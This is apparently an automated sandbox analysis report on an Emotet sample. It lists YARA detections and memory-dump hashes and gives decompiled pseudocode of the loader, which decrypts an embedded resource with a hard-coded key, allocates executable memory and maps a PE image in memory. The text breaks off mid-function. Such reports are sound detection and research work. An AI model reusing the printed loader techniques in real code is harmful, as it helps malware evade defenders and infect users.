                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419544198.0000000003881000.00000010.00000800.00020000.00000000.sdmp, Offset: 03880000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.419482903.0000000003880000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction ID: c60dd6c440bdc1258c8ddb65af26dfd0bd1898c609ce320b1fe356459cb52c7b
                                                                                                                      • Opcode Fuzzy Hash: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction Fuzzy Hash: 26D1D33061CA8D4FCB59EB6C8554624BBE1FF5D348B5849EEE48AC7293DA20CC81C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419544198.0000000003881000.00000010.00000800.00020000.00000000.sdmp, Offset: 03881000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction ID: c60dd6c440bdc1258c8ddb65af26dfd0bd1898c609ce320b1fe356459cb52c7b
                                                                                                                      • Opcode Fuzzy Hash: fe32e61ed4f5103866e8a8ca47157c97b2756e6e9d421390b7636b8d82ed2ce4
                                                                                                                      • Instruction Fuzzy Hash: 26D1D33061CA8D4FCB59EB6C8554624BBE1FF5D348B5849EEE48AC7293DA20CC81C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03880000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.419482903.0000000003880000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction ID: 21a7dd4f983d6645829d69e40e1d60f50fd11cc21139ac54f47c6b6754d104ca
                                                                                                                      • Opcode Fuzzy Hash: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction Fuzzy Hash: 4251072471CA4C4FCB4DEB5C9855A20B7D1FB9D704F4880EEE48AC72A2DA64CC81C792
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03883000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction ID: 21a7dd4f983d6645829d69e40e1d60f50fd11cc21139ac54f47c6b6754d104ca
                                                                                                                      • Opcode Fuzzy Hash: 05f0d6d350534050b74bfa559e765195e6ed9e211163f411792f6d3c99cad7db
                                                                                                                      • Instruction Fuzzy Hash: 4251072471CA4C4FCB4DEB5C9855A20B7D1FB9D704F4880EEE48AC72A2DA64CC81C792
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03880000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.419482903.0000000003880000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction ID: 01cc9a7285952cdd795b0de68656487d61f820294ca7d23b41ab1ad372f5e4b2
                                                                                                                      • Opcode Fuzzy Hash: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction Fuzzy Hash: A9D012291097C44FD356B7B914254283A61DA166CD31810C79587DF253C9004D518753
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419525162.0000000003883000.00000010.00000800.00020000.00000000.sdmp, Offset: 03883000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3880000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction ID: 01cc9a7285952cdd795b0de68656487d61f820294ca7d23b41ab1ad372f5e4b2
                                                                                                                      • Opcode Fuzzy Hash: e8a223e74ed0d0ecbf0da2ce2eda6994a90b3c036ff9af7d6df34317e1b1ffb5
                                                                                                                      • Instruction Fuzzy Hash: A9D012291097C44FD356B7B914254283A61DA166CD31810C79587DF253C9004D518753
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.419571134.0000000003520000.00000010.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3520000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction ID: 69c2cc473ba2ffe46571bfbe81b6e6a88fc87abe89913d0fe80f3f1d61f44521
                                                                                                                      • Opcode Fuzzy Hash: b04f84d3da282ab9f3515e8714ca7752489d3f535ff0800439f2539d553039c5
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.688009031.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (x86)\AutoIt3\AutoItX
                                                                                                                      • API String ID: 0-1028575564
                                                                                                                      • Opcode ID: a26e667154bcef9657e5c534072332a7ec84af8cde794f08ab9567a575fc6bd2
                                                                                                                      • Instruction ID: a459c7075ea8e3cfbdc82a3251c522c10dce822885d38d14cde1d3fdf44b7087
                                                                                                                      • Opcode Fuzzy Hash: a26e667154bcef9657e5c534072332a7ec84af8cde794f08ab9567a575fc6bd2
                                                                                                                      • Instruction Fuzzy Hash: C6718820A0EBC64FE71357786C6A6A17FB09F57214F0A40EBD488CB0E3D948599AC762
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.688009031.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f4eeb6fb9dc550afe48a890d843d336be614189d08207a3f337cfb781d69539b
                                                                                                                      • Instruction ID: dd89b1f436cdebc65d2c80fda631844d9f3cbcfb1855e3e0f41256a5e5494c4d
                                                                                                                      • Opcode Fuzzy Hash: f4eeb6fb9dc550afe48a890d843d336be614189d08207a3f337cfb781d69539b
                                                                                                                      • Instruction Fuzzy Hash: A431402194E7C68FE75753785CA96A03FB0AF07210B0E00E7D088CF0A3E95C8D8AC762
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:21.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				void* _v8;
                                                                                                                      				void* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				short _v22;
                                                                                                                      				short _v24;
                                                                                                                      				short _v26;
                                                                                                                      				short _v28;
                                                                                                                      				short _v30;
                                                                                                                      				short _v32;
                                                                                                                      				short _v34;
                                                                                                                      				short _v36;
                                                                                                                      				short _v38;
                                                                                                                      				char _v40;
                                                                                                                      				void* _v44;
                                                                                                                      				void* _v48;
                                                                                                                      				long _v52;
                                                                                                                      				void* _v56;
                                                                                                                      				struct HRSRC__* _v60;
                                                                                                                      				short _v64;
                                                                                                                      				short _v66;
                                                                                                                      				short _v68;
                                                                                                                      				short _v70;
                                                                                                                      				short _v72;
                                                                                                                      				short _v74;
                                                                                                                      				short _v76;
                                                                                                                      				short _v78;
                                                                                                                      				short _v80;
                                                                                                                      				short _v82;
                                                                                                                      				short _v84;
                                                                                                                      				short _v86;
                                                                                                                      				char _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				void* __ebp;
                                                                                                                      				signed int _t66;
                                                                                                                      				void* _t70;
                                                                                                                      				void* _t72;
                                                                                                                      				struct HRSRC__* _t74;
                                                                                                                      				void* _t78;
                                                                                                                      				intOrPtr _t92;
                                                                                                                      				void* _t93;
                                                                                                                      				void* _t95;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      				signed int _t120;
                                                                                                                      				void* _t121;
                                                                                                                      
                                                                                                                      				_t119 = __esi;
                                                                                                                      				_t118 = __edi;
                                                                                                                      				_t96 = __ebx;
                                                                                                                      				_t66 =  *0x100545cc; // 0xcd5fceb9
                                                                                                                      				_v20 = _t66 ^ _t120;
                                                                                                                      				_v92 = _a8;
                                                                                                                      				 *0x10055a80 = _a4;
                                                                                                                      				_t109 = _a8;
                                                                                                                      				 *0x10055a84 = _a8;
                                                                                                                      				 *0x10055a88 = _a12;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v52 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_t70 = E10006A90(__eflags); // executed
                                                                                                                      				_t131 = _t70;
                                                                                                                      				if(_t70 != 0) {
                                                                                                                      					_push(0x10046758);
                                                                                                                      					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                      					_t72 = 0;
                                                                                                                      				} else {
                                                                                                                      					 *0x100530b8 = 0;
                                                                                                                      					 *0x100530bc = 0;
                                                                                                                      					 *0x100530c0 = 0;
                                                                                                                      					 *0x100530c8 = 0;
                                                                                                                      					 *0x100530c4 = 0;
                                                                                                                      					 *0x100530cc = 0;
                                                                                                                      					_v60 = 0;
                                                                                                                      					_v56 = 0;
                                                                                                                      					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                      					_v60 = _t74;
                                                                                                                      					_v56 = LoadResource(_a4, _v60);
                                                                                                                      					_v52 = SizeofResource(_a4, _v60);
                                                                                                                      					_v88 = 0x6b;
                                                                                                                      					_v86 = 0x65;
                                                                                                                      					_v84 = 0x72;
                                                                                                                      					_v82 = 0x6e;
                                                                                                                      					_v80 = 0x65;
                                                                                                                      					_v78 = 0x6c;
                                                                                                                      					_v76 = 0x33;
                                                                                                                      					_v74 = 0x32;
                                                                                                                      					_v72 = 0x2e;
                                                                                                                      					_v70 = 0x64;
                                                                                                                      					_v68 = 0x6c;
                                                                                                                      					_v66 = 0x6c;
                                                                                                                      					_v64 = 0;
                                                                                                                      					_v40 = 0x6e;
                                                                                                                      					_v38 = 0x74;
                                                                                                                      					_v36 = 0x64;
                                                                                                                      					_v34 = 0x6c;
                                                                                                                      					_v32 = 0x6c;
                                                                                                                      					_v30 = 0x2e;
                                                                                                                      					_v28 = 0x64;
                                                                                                                      					_v26 = 0x6c;
                                                                                                                      					_v24 = 0x6c;
                                                                                                                      					_v22 = 0;
                                                                                                                      					_t78 = E10006A90(_t131); // executed
                                                                                                                      					if(_t78 == 0) {
                                                                                                                      						_t45 =  &_v88; // 0x6b
                                                                                                                      						_t95 = E100048E0(_t45);
                                                                                                                      						_t121 = _t121 + 4;
                                                                                                                      						_v44 = _t95;
                                                                                                                      					}
                                                                                                                      					_t47 =  &_v40; // 0x6e
                                                                                                                      					_v48 = E100048E0(_t47);
                                                                                                                      					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                      					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                      					_t133 =  *0x10055a78;
                                                                                                                      					if( *0x10055a78 == 0) {
                                                                                                                      						__eflags = 0x2000;
                                                                                                                      						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                      					} else {
                                                                                                                      						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                      						_v12 = _t93;
                                                                                                                      					}
                                                                                                                      					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                      					_t104 =  *0x100530b4; // 0x2795
                                                                                                                      					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                      					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                      					_t109 = _v16;
                                                                                                                      					E10003EE0(_v16, _v12, _v52);
                                                                                                                      					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                      					 *0x10055a8c = _t92;
                                                                                                                      					_t72 = 1;
                                                                                                                      				}
                                                                                                                      				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                      			}


                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-2839844625
                                                                                                                      • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                      • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				void* _v8;
                                                                                                                      				void* _v12;
                                                                                                                      				signed short* _v16;
                                                                                                                      				void* _v20;
                                                                                                                      				void* _v24;
                                                                                                                      				long _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				char _v68;
                                                                                                                      				void* _v72;
                                                                                                                      				intOrPtr _v76;
                                                                                                                      				intOrPtr* _v80;
                                                                                                                      				intOrPtr _v84;
                                                                                                                      				void* _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v96;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				void* _t180;
                                                                                                                      				void* _t191;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t202;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				void* _t220;
                                                                                                                      				intOrPtr _t269;
                                                                                                                      				intOrPtr _t278;
                                                                                                                      				intOrPtr _t326;
                                                                                                                      
                                                                                                                      				_v100 = __ecx;
                                                                                                                      				_v72 = 0;
                                                                                                                      				_v20 = 0;
                                                                                                                      				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                      					_v16 = _a4;
                                                                                                                      					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                      						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                      						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                      							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                      							_v80 = _a4 +  *_t15;
                                                                                                                      							if( *_v80 == 0x4550) {
                                                                                                                      								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                      									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                      										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                      										_v32 =  *(_v80 + 0x38);
                                                                                                                      										_v12 = 0;
                                                                                                                      										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                      											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                      												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                      											} else {
                                                                                                                      												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                      											}
                                                                                                                      											if(_v88 > _v20) {
                                                                                                                      												_v20 = _v88;
                                                                                                                      											}
                                                                                                                      											_v12 = _v12 + 1;
                                                                                                                      											_v84 = _v84 + 0x28;
                                                                                                                      										}
                                                                                                                      										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                      										_t59 = _v64 - 1; // 0x71
                                                                                                                      										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                      										_t65 = _v64 - 1; // -1
                                                                                                                      										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                      											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                      											_v24 = _t180;
                                                                                                                      											if(_v24 != 0) {
                                                                                                                      												L26:
                                                                                                                      												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                      												if(_v72 != 0) {
                                                                                                                      													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                      													asm("sbb edx, edx");
                                                                                                                      													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                      													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                      														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                      														_v8 = _t191;
                                                                                                                      														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                      														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                      														 *_v72 = _v8 +  *_t115;
                                                                                                                      														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                      														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                      														if(_t198 != 0) {
                                                                                                                      															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                      															_v76 = _t269;
                                                                                                                      															if(_t269 == 0) {
                                                                                                                      																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                      															} else {
                                                                                                                      																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                      															}
                                                                                                                      															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                      																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                      																if(_t202 != 0) {
                                                                                                                      																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                      																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                      																			 *(_v72 + 0x2c) = 0;
                                                                                                                      																			L49:
                                                                                                                      																			return _v72;
                                                                                                                      																		}
                                                                                                                      																		if( *(_v72 + 0x14) == 0) {
                                                                                                                      																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                      																			L47:
                                                                                                                      																			goto L49;
                                                                                                                      																		}
                                                                                                                      																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                      																		_t209 =  *0x10055a88; // 0x0
                                                                                                                      																		_t278 =  *0x10055a84; // 0x1
                                                                                                                      																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                      																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                      																		if(_v92 != 0) {
                                                                                                                      																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                      																			goto L47;
                                                                                                                      																		}
                                                                                                                      																		SetLastError(0x45a);
                                                                                                                      																		L50:
                                                                                                                      																		E10002840(_v100, _v72);
                                                                                                                      																		return 0;
                                                                                                                      																	}
                                                                                                                      																	goto L50;
                                                                                                                      																}
                                                                                                                      																goto L50;
                                                                                                                      															}
                                                                                                                      															goto L50;
                                                                                                                      														}
                                                                                                                      														goto L50;
                                                                                                                      													}
                                                                                                                      													goto L50;
                                                                                                                      												}
                                                                                                                      												VirtualFree(_v24, 0, 0x8000);
                                                                                                                      												SetLastError(0xe);
                                                                                                                      												return 0;
                                                                                                                      											}
                                                                                                                      											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                      											_v24 = _t220;
                                                                                                                      											if(_v24 != 0) {
                                                                                                                      												goto L26;
                                                                                                                      											}
                                                                                                                      											SetLastError(0xe);
                                                                                                                      											return 0;
                                                                                                                      										}
                                                                                                                      										SetLastError(0xc1);
                                                                                                                      										return 0;
                                                                                                                      									}
                                                                                                                      									SetLastError(0xc1);
                                                                                                                      									return 0;
                                                                                                                      								}
                                                                                                                      								SetLastError(0xc1);
                                                                                                                      								return 0;
                                                                                                                      							}
                                                                                                                      							SetLastError(0xc1);
                                                                                                                      							return 0;
                                                                                                                      						}
                                                                                                                      						return 0;
                                                                                                                      					}
                                                                                                                      					SetLastError(0xc1);
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}






























                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0068F8FD() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
